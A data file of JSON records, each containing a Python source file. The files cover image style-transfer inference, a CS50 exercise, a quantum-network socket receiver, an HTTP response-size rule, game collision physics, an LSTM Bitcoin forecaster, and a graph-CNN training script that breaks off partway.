+{"seq_id":"509491059","text":"import numpy as np\nfrom PIL import Image\nimport network\nimport os\nimport math\nimport render_utils\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nimport cv2\nimport render_parallel\nimport render_serial\n\n\ndef main(input_path, model_path, output_dir, need_animation=False, resize_h=None, resize_w=None, serial=False):\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n input_name = os.path.basename(input_path)\n output_path = os.path.join(output_dir, input_name)\n frame_dir = None\n if need_animation:\n if not serial:\n print('It must be under serial mode if animation results are required, so serial flag is set to True!')\n serial = True\n frame_dir = os.path.join(output_dir, input_name[:input_name.find('.')])\n if not os.path.exists(frame_dir):\n os.mkdir(frame_dir)\n stroke_num = 8\n\n #* ----- load model ----- *#\n paddle.set_device('gpu')\n net_g = network.Painter(5, stroke_num, 256, 8, 3, 3)\n net_g.set_state_dict(paddle.load(model_path))\n net_g.eval()\n for param in net_g.parameters():\n param.stop_gradient = True\n\n #* ----- load brush ----- *#\n brush_large_vertical = render_utils.read_img('brush/brush_large_vertical.png', 'L')\n brush_large_horizontal = render_utils.read_img('brush/brush_large_horizontal.png', 'L')\n meta_brushes = paddle.concat([brush_large_vertical, brush_large_horizontal], axis=0)\n\n import time\n t0 = time.time()\n\n original_img = render_utils.read_img(input_path, 'RGB', resize_h, resize_w)\n if serial:\n final_result_list = render_serial.render_serial(original_img, net_g, meta_brushes)\n if need_animation:\n\n print(\"total frame:\", len(final_result_list))\n for idx, frame in enumerate(final_result_list):\n cv2.imwrite(os.path.join(frame_dir, '%03d.png' % idx), frame)\n else:\n cv2.imwrite(output_path, final_result_list[-1])\n else:\n final_result = render_parallel.render_parallel(original_img, net_g, meta_brushes)\n cv2.imwrite(output_path, final_result)\n\n print(\"total infer time:\", time.time() - t0)\n\n\nif __name__ == '__main__':\n\n main(\n input_path='input/chicago.jpg',\n model_path='paint_best.pdparams',\n output_dir='output/',\n need_animation=True, # whether need intermediate results for animation.\n resize_h=512, # resize original input to this size. None means do not resize.\n resize_w=512, # resize original input to this size. None means do not resize.\n serial=True) # if need animation, serial must be True.\n","repo_name":"PaddlePaddle/PaddleHub","sub_path":"modules/image/Image_gan/style_transfer/paint_transformer/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":12260,"dataset":"github-code","pt":"91"}
+{"seq_id":"2655505897","text":"import cs50\n\ndef main():\n n = 0\n while True:\n print(\"Height: \", end = \"\")\n n = cs50.get_int()\n if(n >= 0 and n <= 23):\n break\n \n for i in range(n, 0 , -1):\n for a in range (i - 1):\n print(\" \", end = \"\")\n \n for b in range(i, n + 1):\n print(\"#\", end = \"\")\n print(\"#\")\n \nif __name__ == \"__main__\":\n main()\n ","repo_name":"PaskoZhelev/CS50x-Harvard","sub_path":"pset6/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"15822827245","text":"\"\"\"\nReceive a classical message from the sender.\n\"\"\"\n\nfrom netqasm.logging.output import get_new_app_logger\nfrom netqasm.sdk.external import NetQASMConnection, Socket\nfrom netqasm.sdk import EPRSocket\n\n\ndef main(app_config=None):\n \"\"\"\n Application main function for the receiver.\n \"\"\"\n\n app_logger = get_new_app_logger(app_name=app_config.app_name, log_config=app_config.log_config)\n app_logger.log(\"receiver starts\")\n\n app_logger.log(\"receiver creates classical socket\")\n socket = Socket(\"receiver\", \"sender\", log_config=app_config.log_config)\n\n app_logger.log(\"receiver creates quantum socket\")\n epr_socket = EPRSocket(\"sender\")\n\n app_logger.log(\"receiver creates qasm connection\")\n _receiver = NetQASMConnection(\n \"receiver\", log_config=app_config.log_config, epr_sockets=[epr_socket]\n )\n\n message = socket.recv()\n app_logger.log(f\"receiver receives messate {message} from sender\")\n\n return \"receiver finishes\"\n","repo_name":"brunorijsman/quantum-internet-hackathon-2022","sub_path":"qne_adk/classical_socket/src/app_receiver.py","file_name":"app_receiver.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"15598077663","text":"from statistics import mean, stdev\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass IgnoreLargeBody:\n\n def __init__(self, initial_limit=1024*1024):\n self.initial_limit = initial_limit\n self.data = BodySize(self.initial_limit)\n\n def set_kb(self, kb):\n kb.body_size = self.data\n\n def load_kb(self, kb):\n self.data = kb.body_size\n\n async def after_headers(self, entry):\n entry.result.read_length = self._get_read_limit(entry.response)\n\n async def after_response(self, entry):\n if entry.result.read_length == -1:\n # Collect statistics post-response when the content-length was unknown.\n full_length = len(entry.response.raw)\n limit = self.data.applicable_limit\n self.data.add(full_length)\n\n if full_length > limit:\n # Apply the limit post-response if above the desired limit\n # Keep read_length coherent with the content for other heuristics to\n # work from.\n entry.response.raw = entry.response.raw[0:limit]\n entry.response.truncated = True\n entry.result.read_length = limit\n\n def _get_read_limit(self, response):\n length = response.headers.get('Content-Length')\n if length is not None:\n try:\n length = int(length)\n self.data.add(length)\n return self.data.applicable_limit\n except ValueError:\n logger.debug(\"Bad Content-Length: %s\", length)\n\n return self.data.calculated_limit or -1\n\n\nclass BodySize:\n\n def __init__(self, initial_limit):\n self.initial_limit = initial_limit\n self.collected_sizes = []\n self.calculated_limit = None\n\n @property\n def applicable_limit(self):\n return self.calculated_limit or self.initial_limit\n\n def add(self, length):\n if self.calculated_limit is None:\n self.collected_sizes.append(length)\n\n if len(self.collected_sizes) > 500:\n self.calculated_limit = int(mean(self.collected_sizes) + 5 * stdev(self.collected_sizes))\n logger.info(\"Updating max body size to %s\", self.calculated_limit)\n","repo_name":"delvelabs/hammertime","sub_path":"hammertime/rules/body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"91"}
+{"seq_id":"25324351172","text":"from block_mechanism import BlockMechanism\nfrom block import Block\nimport numpy as np\nnp.seterr(divide='ignore', invalid='ignore')\nimport math\n\nclass CollisionDirector():\n def detect_and_effect_collision(self,block_mechanism_1:BlockMechanism, block_mechanism_2:BlockMechanism, time_between_frame:float):\n '''\n if there is collision, return (block1, block2)\n block1 from mecha1, block2 from mecha2\n else return None\n '''\n for _, block1 in block_mechanism_1.get_blocks().items():\n for _, block2 in block_mechanism_2.get_blocks().items():\n if not (block1._visible and block2._visible):\n continue\n if not (self.block_collide_data(block1, block2) == None):\n # print(\"Col Director:\", self.block_collide_data(block1, block2))\n effect_loc, normal_vector_block2= self.block_collide_data(block1, block2)\n\n impluse = self._cal_collision_impluse(block_mechanism_1.get_momentum(), block_mechanism_2.get_momentum(), block_mechanism_1.get_angular_momentum(), block_mechanism_2.get_angular_momentum(),block_mechanism_1.get_mass(), block_mechanism_2.get_mass(), normal_vector_block2, 1).transpose()\n # print(\"Col Director: impluse:\", impluse)\n\n force_1 = (-impluse[0]/time_between_frame, -impluse[1]/time_between_frame)\n force_2 = (impluse[0]/time_between_frame, impluse[1]/time_between_frame)\n block_mechanism_1.add_force(force_1, effect_loc, time_between_frame)\n block_mechanism_2.add_force(force_2, effect_loc, time_between_frame)\n \n # Damage block\n val1=math.sqrt(block_mechanism_1._momentum[0]**2 + block_mechanism_1._momentum[1]**2)\n val2=math.sqrt(block_mechanism_2._momentum[0]**2 + block_mechanism_2._momentum[1]**2)\n val = (val1+val2)/5000\n block1.damage_block(val)\n block2.damage_block(val)\n #print(\"damage: \",val)\n\n # Remove destroyed blocks\n if block1.get_status()==0:\n block_mechanism_1.remove_block(block1)\n\n if block2.get_status()==0:\n block_mechanism_2.remove_block(block2)\n\n return (block1, block2)\n return None\n \n def block_collide_data(self, block1:Block, block2:Block) -> tuple:\n '''\n return node:tuple, normal_vector, the direction of force of block2:np.ndarray\n if doesnt collide, returns None\n '''\n # block2's node in block1\n IMPACT_LINE_STRETCH = 100\n for node_index in range(len(block2.get_nodes())):\n if self.is_node_in_block(block2.get_nodes()[node_index], block1):\n node = tuple(block2.get_nodes()[node_index])\n impact_line = [block2.get_previous_nodes()[node_index], tuple(block2.get_nodes()[node_index])]\n impact_line[0] = ((impact_line[0][0]-impact_line[1][0])*IMPACT_LINE_STRETCH+impact_line[1][0], (impact_line[0][1]-impact_line[1][1])*IMPACT_LINE_STRETCH+impact_line[1][1])\n impact_line[1] = ((impact_line[1][0]-impact_line[0][0])*IMPACT_LINE_STRETCH+impact_line[0][0], (impact_line[1][1]-impact_line[0][1])*IMPACT_LINE_STRETCH+impact_line[0][1])\n for line in block1.get_lines():\n if self._detect_crossover(line, impact_line):\n # #print(node, self._normal_vector_for_impactor(impact_line, line))\n return node, self._normal_vector_for_impactor(impact_line, line)\n return None\n return None\n\n def is_node_in_block(self, node:tuple, block:Block) -> bool:\n '''\n if there is a node which is in the block, return the node\n '''\n nodes = block.get_nodes()\n if not ((nodes[0][0]-nodes[1][0]) == 0 or (nodes[2][0]-nodes[1][0]) == 0):\n ma = (nodes[0][1]-nodes[1][1])/(nodes[0][0]-nodes[1][0])\n b1 = nodes[1][1]-ma*nodes[1][0]\n b2 = nodes[2][1]-ma*nodes[2][0]\n bt = node[1]-ma*node[0]\n if not ((b2 >= bt and bt >= b1) or (b1 >= bt 
and bt >= b2)):\n return False\n \n mb = ((nodes[2][1]-nodes[1][1])/(nodes[2][0]-nodes[1][0]))\n b1 = nodes[1][1]-mb*nodes[1][0]\n b0 = nodes[0][1]-mb*nodes[0][0]\n btt = node[1]-mb*node[0]\n if not ((b1 >= btt and btt >= b0) or (b0 >= btt and btt >= b1)):\n return False\n \n return True\n else:\n # x coor\n if not ((nodes[1][0] >= node[0] and node[0] >= nodes[3][0]) or (nodes[3][0] >= node[0] and node[0] >= nodes[1][0])):\n return False\n \n # y coor\n if not ((nodes[1][1] >= node[1] and node[1] >= nodes[3][1]) or (nodes[3][1] >= node[1] and node[1] >= nodes[1][1])):\n return False\n \n return True\n \n def _normal_vector_for_impactor(self, impact_line, hit_line) -> np.ndarray:\n '''\n hit line been hit by node\n '''\n v1 = np.array([impact_line[1][0]-impact_line[0][0], impact_line[1][1]-impact_line[1][0]]).transpose()\n v2 = np.array([hit_line[1][0]-hit_line[0][0], hit_line[1][1]-hit_line[1][0]]).transpose()\n vn = v1 - (np.dot(v1, v2)/np.dot(v2, v2))*v2\n vn_length = np.linalg.norm(vn)\n\n if vn_length == 0:\n return 0\n else:\n vn = -1*(vn/vn_length)\n return vn\n \n def _array_to_tuple(self, arr):\n if isinstance(arr, np.ndarray):\n return tuple(self._array_to_tuple(e) for e in arr)\n else:\n return arr\n \n def _detect_crossover(self, line1:tuple, line2:tuple) -> bool:\n '''\n line is made of two points ((x1, y1), (x2, y2))\n '''\n # ax + by = c\n # y - y0 = m(x - x0)\n # (y-y0) = mx - mx0\n # y-y0-mx = -mx0\n # y - mx = y0 - mx0\n # #print(f\"line1:{line1}\")\n # #print(f\"line2:{line2}\")\n line2_points_for_line1 = False\n try:\n m1 = (line1[1][1]-line1[0][1])/(line1[1][0]-line1[0][0])\n line1_equation = lambda x, y: y - (line1[1][1]-line1[0][1])/(line1[1][0]-line1[0][0])*x\n answer_if_on_line1 = line1[0][1]-m1*line1[0][0]\n \n if not ((line1_equation(line2[0][0], line2[0][1]) > answer_if_on_line1 and line1_equation(line2[1][0], line2[1][1]) > answer_if_on_line1) or\\\n (line1_equation(line2[0][0], line2[0][1]) < answer_if_on_line1 and line1_equation(line2[1][0], line2[1][1]) < answer_if_on_line1)):\n # #print(\"CROSSOVER\")\n line2_points_for_line1 = True\n except: # ZeroDivisionError:\n x = line1[0][0]\n if not ((line2[0][0] > x and line2[1][0] > x) or (line2[0][0] < x and line2[1][0] < x)):\n # #print(\"CROSSOVER\")\n line2_points_for_line1 = True\n \n line1_points_for_line2 = False\n try:\n m2 = (line2[1][1]-line2[0][1])/(line2[1][0]-line2[0][0])\n line2_equation = lambda x, y: y - (line2[1][1]-line2[0][1])/(line2[1][0]-line2[0][0])*x\n answer_if_on_line2 = line2[0][1]-m2*line2[0][0]\n \n if not ((line2_equation(line1[0][0], line1[0][1]) > answer_if_on_line2 and line2_equation(line1[1][0], line1[1][1]) > answer_if_on_line2) or\\\n (line2_equation(line1[0][0], line1[0][1]) < answer_if_on_line2 and line2_equation(line1[1][0], line1[1][1]) < answer_if_on_line2)):\n # #print(\"CROSSOVER\")\n line1_points_for_line2 = True\n except: # ZeroDivisionError:\n x = line2[0][0]\n if not ((line1[0][0] > x and line1[1][0] > x) or (line1[0][0] < x and line1[1][0] < x)):\n # #print(\"CROSSOVER\")\n line1_points_for_line2 = True\n \n return line2_points_for_line1 and line1_points_for_line2\n \n def _cal_collision_impluse(self, momentum1:tuple, momentum2:tuple, angular_momentum1:float, angular_momentum2:float, mass1:float, mass2:float, normal_vector:np.ndarray, e:float) -> np.ndarray:\n '''\n e must be 0 to 1\n normal_vector is the back direction of the opponent's direction\n '''\n SCALAR_MIN = 1000\n momentum1 = np.array(momentum1).transpose()\n momentum2 = np.array(momentum2).transpose()\n \n 
scalar = ((1+e)*np.dot(((momentum1*(1/mass1))-(momentum2*(1/mass2))), normal_vector))/((1/mass1)+(1/mass2))\n scalar += abs((1+e)*(((angular_momentum1*(1/mass1))-(angular_momentum2*(1/mass2)))))/((1/mass1)+(1/mass2))\n #print(\"Col dir: Scalar:\", scalar)\n if np.linalg.norm(scalar) < SCALAR_MIN:\n if np.linalg.norm(scalar) == 0:\n scalar = scalar*SCALAR_MIN\n else:\n scalar = scalar*(SCALAR_MIN/np.linalg.norm(scalar))\n\n impluse = scalar*normal_vector\n return impluse\n ","repo_name":"dctime/atom-collision","sub_path":"collision_director.py","file_name":"collision_director.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"17019976774","text":"#!/usr/bin/env python3\n\"\"\" use keras to predict btc price based on previous 24h data \"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\n\n# first we need to use functions to get data into a tf dataset\ndef split_window(features):\n \"\"\" healper function for mapping data as inputs and labels\n features: the timeseries dataset as array\n Returns: inputs, labels\n inputs: list of the time series for training\n labels: list of the corresponding labels\n \"\"\"\n input_w = 24 * 60\n label_w = 1\n label_start = 24 * 60 + 59\n input_slice = slice(0, input_w)\n label_slice = slice(label_start, None)\n\n inputs = features[:, input_slice, :]\n labels = features[:, label_slice, :]\n labels = labels[:, :, -1:]\n\n inputs.set_shape([None, input_w, None])\n labels.set_shape([None, label_w, None])\n return inputs, labels\n\n\ndef keras_data(dataframe):\n \"\"\" change pandas dataframe into keras detaset\n dataframe: a pandas dataframe, preprocesses, but not normalized\n Returns: the tf.dataset.Dataset\n \"\"\"\n # if timestamp column remains remove\n # datafram = dataframe.drop(labels=['Timestamp'], axis='columns')\n\n # normalize dataframe data in place\n dataframe = (dataframe - dataframe.mean()) / dataframe.std()\n\n # conver to numpy\n data_arr = np.array(dataframe, dtype=np.float32)\n\n # make tf timeseries from the np array\n # this particular set of data has an offset of 8 minutes\n sequence_length = 60 * 25\n # this is only keras >2\n ids = tf.keras.preprocessing.timeseries_dataset_from_array(\n data_arr,\n targets=None,\n sequence_length=sequence_length,\n sequence_stride=60,\n batch_size=64,\n start_index=8)\n ids = ids.map(split_window)\n return ids\n\n\ndef make_model():\n \"\"\" create the keras model for training later\n useful to have as separate function to easily change model later\n \"\"\"\n keras = tf.keras\n model = keras.models.Sequential()\n # potential extra lstm layer here\n model.add(keras.layers.LSTM(64, activation='relu', return_sequences=False))\n model.add(keras.layers.Dense(1))\n # es = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=2,\n # mode='min')\n model.compile(optimizer='adam',\n loss='mse',\n metrics=[tf.metrics.MeanAbsoluteError()])\n return model\n\n\nif __name__ == \"__main__\":\n dfnoncor = pd.read_csv('processed_data.csv')\n n = len(dfnoncor)\n train_split = int(n * 0.8)\n\n # create separate training and validation training sets\n train_df = dfnoncor[:train_split]\n valid_df = dfnoncor[train_split:]\n\n # create tf datasets from them\n train_ds = keras_data(train_df)\n valid_ds = keras_data(valid_df)\n\n # create model\n dsmodel = make_model()\n\n # create earlys tsopping criteria\n es = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=2,\n mode='min')\n\n # train the model\n hist = dsmodel.fit(x=train_ds,\n validation_data=valid_ds,\n callbacks=[es],\n epochs=20)\n","repo_name":"mag389/holbertonschool-machine_learning","sub_path":"supervised_learning/0x0E-time_series/forecast_btc.py","file_name":"forecast_btc.py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39237429299","text":"# %load_ext autoreload\n# %autoreload 2\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport sys, os\nsys.path.insert(0, '..')\nimport models, graph, coarsening, utils\n# from utils import model_perf\n\nimport tensorflow as tf\nimport numpy as np\nimport time\nimport argparse\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\nimport scipy.sparse as sp\nimport pickle as pkl\n\n# from tensorflow.examples.tutorials.mnist import input_data\n\n# %matplotlib inline\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n# neural network setting\n# Graphs.\nflags.DEFINE_integer('number_edges', 8, 'Graph: minimum number of edges per vertex.')\nflags.DEFINE_string('metric', 'euclidean', 'Graph: similarity measure (between features).')\n# TODO: change cgcnn for combinatorial Laplacians.\nflags.DEFINE_bool('normalized_laplacian', True, 'Graph Laplacian: normalized.')\nflags.DEFINE_integer('coarsening_levels', 4, 'Number of coarsened graphs.')\n\n# Directories.\n# flags.DEFINE_string('dir_data', os.path.join('..', 'data', 'mnist'), 'Directory to store data.')\n\nresults_auc = dict()\nresults = list()\n\nclass model_perf(object):\n\n def __init__(self):\n self.names, self.params = set(), {}\n self.fit_auc, self.fit_losses, self.fit_time = {}, {}, {}\n self.train_auc, self.train_loss = {}, {}\n self.test_auc, self.test_loss = {}, {}\n self.train_represent = {}\n\n\n def test(self, model, name, params, data, train_pairs, train_labels, val_data, val_labels, test_pairs, test_labels):\n self.params[name] = params\n self.fit_auc[name], self.fit_losses[name], self.fit_time[name] = \\\n model.fit(data, train_pairs, train_labels, val_data, val_labels)\n # string, self.train_auc[name], self.train_loss[name], _ = \\\n # model.evaluate(train_data, train_labels)\n # print('train {}'.format(string))\n del val_data, val_labels\n n, v, m, f = data.shape\n if params['method'] == 'gcn' or params['method'] == '2gcn':\n test_data = np.zeros([test_pairs.shape[0], v, m, f, 2])\n test_data[:,:,:,:,0] = data[test_pairs[:,0], :, :, :]\n test_data[:,:,:,:,1] = data[test_pairs[:,1], :, :, :]\n elif params['method'] == 'fnn' or params['method'] == '2fnn':\n new_data = np.zeros([n, v, m*f])\n for i in range(n):\n for j in range(v):\n new_data[i, j, :] = data[i, j, :, :].flatten()\n test_data = np.zeros([test_pairs.shape[0], v, m*f, 2])\n test_data[:,:,:,0] = new_data[test_pairs[:,0], :, :]\n test_data[:,:,:,1] = new_data[test_pairs[:,1], :, :]\n print (test_data.shape)\n string, self.test_auc[name], self.test_loss[name], _, = \\\n model.evaluate(test_data, test_labels)\n print('test {}'.format(string))\n\n # f = open('test.roi.gcn.pkl', 'wb')\n # pkl.dump(test_represent, f, -1)\n # f.close()\n # f = open('test.roi.pairs.gcn.pkl', 'wb')\n # pkl.dump(test_pairs, f, -1)\n # f.close()\n # self.save_represent(model, data, train_pairs, train_labels, test_pairs, test_labels, params)\n self.names.add(name)\n\n def save_represent_fnn(self, model, data, train_pairs, train_labels, test_pairs, test_labels, params):\n\n n, v, m, f = data.shape\n new_data = np.zeros([n, v, m*f])\n for i in range(n):\n for j in range(v):\n new_data[i, j, :] = data[i, j, :, :].flatten()\n\n n_train = train_pairs.shape[0]\n num = int(np.ceil(n_train/10))\n represent = np.zeros([n_train, 84], dtype='float32')\n for i in range(10): # training data, split into 10 sets\n if (i+1)*num <= n_train:\n tmp_pairs = train_pairs[i*num:(i+1)*num,:]\n train_x = 
np.zeros([tmp_pairs.shape[0], v, m*f, 2])\n train_x[:,:,:,0] = new_data[tmp_pairs[:,0], :, :]\n train_x[:,:,:,1] = new_data[tmp_pairs[:,1], :, :]\n train_y = train_labels[i*num:(i+1)*num]\n print (train_x.shape)\n represent[i*num:(i+1)*num,:] = model.get_represent(train_x, train_y)\n else:\n tmp_pairs = train_pairs[i*num:,:]\n train_x = np.zeros([tmp_pairs.shape[0], v, m*f, 2])\n train_x[:,:,:,0] = new_data[tmp_pairs[:,0], :, :]\n train_x[:,:,:,1] = new_data[tmp_pairs[:,1], :, :]\n train_y = train_labels[i*num:]\n print (train_x.shape)\n represent[i*num:,:] = model.get_represent(train_x, train_y)\n f = open('train.roi.eu.gcn.pkl', 'wb')\n pkl.dump(represent, f, -1)\n f.close()\n f = open('train.roi.pairs.eu.gcn.pkl', 'wb')\n pkl.dump(train_pairs, f, -1)\n f.close()\n\n\n def save_represent(self, model, data, train_pairs, train_labels, test_pairs, test_labels, params):\n\n n, v, m, f = data.shape\n n_train = train_pairs.shape[0]\n num = int(np.ceil(n_train/20))\n represent = np.zeros([n_train, 84], dtype='float32')\n for i in range(20): # training data, split into 10 sets\n if (i+1)*num <= n_train:\n tmp_pairs = train_pairs[i*num:(i+1)*num,:]\n train_x = np.zeros([tmp_pairs.shape[0], v, m, f, 2])\n train_x[:,:,:,:,0] = data[tmp_pairs[:,0], :, :, :]\n train_x[:,:,:,:,1] = data[tmp_pairs[:,1], :, :, :]\n train_y = train_labels[i*num:(i+1)*num]\n print (train_x.shape)\n represent[i*num:(i+1)*num,:] = model.get_represent(train_x, train_y)\n else:\n tmp_pairs = train_pairs[i*num:,:]\n train_x = np.zeros([tmp_pairs.shape[0], v, m, f, 2])\n train_x[:,:,:,:,0] = data[tmp_pairs[:,0], :, :, :]\n train_x[:,:,:,:,1] = data[tmp_pairs[:,1], :, :, :]\n train_y = train_labels[i*num:]\n print (train_x.shape)\n represent[i*num:,:] = model.get_represent(train_x, train_y)\n f = open('train.roi.gcn.pkl', 'wb')\n pkl.dump(represent, f, -1)\n f.close()\n f = open('train.roi.pairs.gcn.pkl', 'wb')\n pkl.dump(train_pairs, f, -1)\n f.close()\n\n\n def save(self, data_type):\n results = list()\n for name in sorted(self.names):\n results.append([name, self.test_accuracy[name], self.train_accuracy[name],\n self.test_f1[name], self.train_f1[name], self.test_loss[name],\n self.train_loss[name], self.fit_time[name]*1000])\n\n if os.path.exists(data_type + '_results.csv'):\n old = pd.read_csv(data_type + '_results.csv', header=None)\n new = pd.DataFrame(data=results)\n r = pd.concat([old, new], ignore_index=True)\n r.to_csv(data_type + '_results.csv', index=False, header=['method', 'test_acc',\n 'train_acc', 'test_f1', 'train_f1', 'test_loss', 'train_loss', 'fit_time'])\n else:\n r = pd.DataFrame(data=results)\n r.to_csv(data_type + '_results.csv', index=False, header=['method', 'test_acc',\n 'train_acc', 'test_f1', 'train_f1', 'test_loss', 'train_loss', 'fit_time'])\n\n\n def fin_result(self, data_type, i_fold=None):\n for name in sorted(self.names):\n if name not in results_auc:\n results_auc[name] = 0\n results_auc[name] += self.test_auc[name]\n results.append([i_fold, self.test_auc[name]])\n if i_fold == 4:\n for name in sorted(self.names):\n results_auc[name] /= 5\n print('{:5.2f} {}'.format(\n results_auc[name], name))\n results.append([name, results_auc[name]])\n r = pd.DataFrame(data=results)\n r.to_csv('../../../data/output/' + data_type + '_fin_results', index=False, header=['method', 'test_auc'])\n\n\n def show(self, fontsize=None):\n if fontsize:\n plt.rc('pdf', fonttype=42)\n plt.rc('ps', fonttype=42)\n plt.rc('font', size=fontsize) # controls default text sizes\n plt.rc('axes', titlesize=fontsize) # fontsize 
of the axes title\n plt.rc('axes', labelsize=fontsize) # fontsize of the x any y labels\n plt.rc('xtick', labelsize=fontsize) # fontsize of the tick labels\n plt.rc('ytick', labelsize=fontsize) # fontsize of the tick labels\n plt.rc('legend', fontsize=fontsize) # legend fontsize\n plt.rc('figure', titlesize=fontsize) # size of the figure title\n print(' auc loss time [ms] name')\n print('test train test train test train')\n for name in sorted(self.names):\n print('{:5.2f} {:5.2f} {:.2e} {:.2e} {:3.0f} {}'.format(\n self.test_auc[name], self.train_auc[name],\n self.test_loss[name], self.train_loss[name], self.fit_time[name]*1000, name))\n\n\ndef preprocess_features(features, scale=1):\n \"\"\" Row-normalized by divide maximum of the row\"\"\"\n rowmax = np.max(features, axis=1).reshape(features.shape[0], 1)\n features = np.int_(scale*np.divide(features, rowmax))\n return features\n\n\ndef grid_graph(m, corners=False):\n z = graph.grid(m)\n dist, idx = graph.distance_sklearn_metrics(z, k=FLAGS.number_edges, metric=FLAGS.metric)\n A = graph.adjacency(dist, idx)\n\n # Connections are only vertical or horizontal on the grid.\n # Corner vertices are connected to 2 neightbors only.\n if corners:\n import scipy.sparse\n A = A.toarray()\n A[A < A.max()/1.5] = 0\n A = scipy.sparse.csr_matrix(A)\n print('{} edges'.format(A.nnz))\n\n print(\"{} > {} edges\".format(A.nnz//2, FLAGS.number_edges*m**2//2))\n return A\n\n\ndef get_feed_data(data, subj, pairs, labels, method='gcn'):\n train_pairs, val_pairs, test_pairs = pairs\n train_labels, val_labels, test_labels = labels\n n, v, m, f = data.shape\n if v == 6:\n print (val_labels.shape)\n n_val_pairs = 10000\n sidx = np.random.permutation(val_labels.shape[0])\n val_pairs = np.array([val_pairs[s, :] for s in sidx[:n_val_pairs]])\n val_labels = np.array([val_labels[s] for s in sidx[:n_val_pairs]])\n # test_pairs = np.array([test_pairs[s, :] for s in sidx[n_val_pairs:]])\n # test_labels = np.array([test_labels[s] for s in sidx[n_val_pairs:]])\n # f = 1 # whether f can be deleted\n if method == 'gcn' or method == '2gcn':\n val_x = np.zeros([val_pairs.shape[0], v, m, f, 2])\n val_x[:,:,:,:,0] = data[val_pairs[:,0], :, :, :]\n val_x[:,:,:,:,1] = data[val_pairs[:,1], :, :, :]\n elif method == 'fnn' or method == '2fnn':\n new_data = np.zeros([n, v, m*f])\n for i in range(n):\n for j in range(v):\n new_data[i, j, :] = data[i, j, :, :].flatten()\n val_x = np.zeros([val_pairs.shape[0], v, m*f, 2])\n val_x[:,:,:,0] = new_data[val_pairs[:,0], :, :]\n val_x[:,:,:,1] = new_data[val_pairs[:,1], :, :]\n\n train_y = train_labels\n val_y = val_labels\n test_y = test_labels\n del subj\n del train_labels, val_labels, test_labels\n del val_pairs\n return train_pairs, train_y, val_x, val_y, test_pairs, test_y\n\n\ndef train(method, view_com, n_views, k, m, n_epoch, batch_size, pairs, labels, coords, subj, data, data_type, i_fold):\n str_params = view_com + '_k' + str(k) + '_m' + str(m) + '_'\n obj_params = 'softmax'\n print (str_params)\n\n print ('Construct ROI graphs...')\n t_start = time.process_time()\n # A = grid_graph(86, corners=False)\n # A = graph.replace_random_edges(A, 0)\n coo1, coo2, coo3 = coords.shape # coo2 is the roi dimension\n features = np.zeros([coo1*coo3, coo2])\n for i in range(coo3):\n features[coo1*i:coo1*(i+1), :] = coords[:, :, i]\n dist, idx = graph.distance_scipy_spatial(np.transpose(features), k=10, metric='euclidean')\n A = graph.adjacency(dist, idx).astype(np.float32)\n\n if method == '2gcn':\n graphs, perm = coarsening.coarsen(A, 
levels=FLAGS.coarsening_levels, self_connections=False)\n L = [graph.laplacian(A, normalized=True) for A in graphs]\n data = coarsening.perm_data1(data, perm, True)\n else:\n graphs = list()\n graphs.append(A)\n L = [graph.laplacian(A, normalized=True)]\n\n print('Execution time: {:.2f}s'.format(time.process_time() - t_start))\n # graph.plot_spectrum(L)\n del A\n\n print ('Set parameters...')\n mp = model_perf()\n # Architecture.\n common = {}\n common['dir_name'] = 'ppmi/'\n common['num_epochs'] = n_epoch\n common['batch_size'] = batch_size\n common['eval_frequency'] = 5 * common['num_epochs']\n common['patience'] = 5\n common['regularization'] = 5e-3\n common['dropout'] = 1\n common['learning_rate'] = 1e-2\n common['decay_rate'] = 0.95\n common['momentum'] = 0.9\n common['n_views'] = n_views\n common['view_com'] = view_com\n # common['brelu'] = 'b1relu'\n # common['pool'] = 'mpool1'\n\n print ('Get feed pairs and labels...')\n train_pairs, train_y, val_x, val_y, test_pairs, test_y = get_feed_data(data, subj, pairs, labels, method)\n C = max(train_y)+1\n common['decay_steps'] = train_pairs.shape[0] / (common['batch_size'] * 5)\n\n\n if method == 'fnn':\n str_params += 'siamese_'\n name = 'mvfnn'\n params = common.copy()\n params['method'] = 'fnn'\n params['fin'] = 1\n params['F'] = [m]\n params['K'] = [1]\n params['p'] = [1]\n params['M'] = [C]\n params['dir_name'] += name\n mp.test(models.siamese_fnn(L, **params), name, params,\n data, train_pairs, train_y, val_x, val_y, test_pairs, test_y)\n\n if method == '2fnn':\n str_params += 'siamese_layer2_'\n name = 'mvfnn2'\n params = common.copy()\n params['method'] = 'fnn'\n params['fin'] = 1\n params['F'] = [m]\n params['K'] = [1]\n params['p'] = [1]\n params['M'] = [64, C]\n params['dir_name'] += name\n mp.test(models.siamese_fnn(L, **params), name, params,\n data, train_pairs, train_y, val_x, val_y, test_pairs, test_y)\n\n if method == 'gcn':\n # str_params += 'b_max_eu_'\n name = 'mvgcn'\n params = common.copy()\n params['method'] = 'gcn'\n params['F'] = [m] # filters\n params['K'] = [k] # supports\n params['p'] = [1]\n params['M'] = [C]\n params['fin'] = val_x.shape[3]\n params['dir_name'] += name\n params['filter'] = 'chebyshev5'\n params['brelu'] = 'b2relu'\n params['pool'] = 'apool1'\n 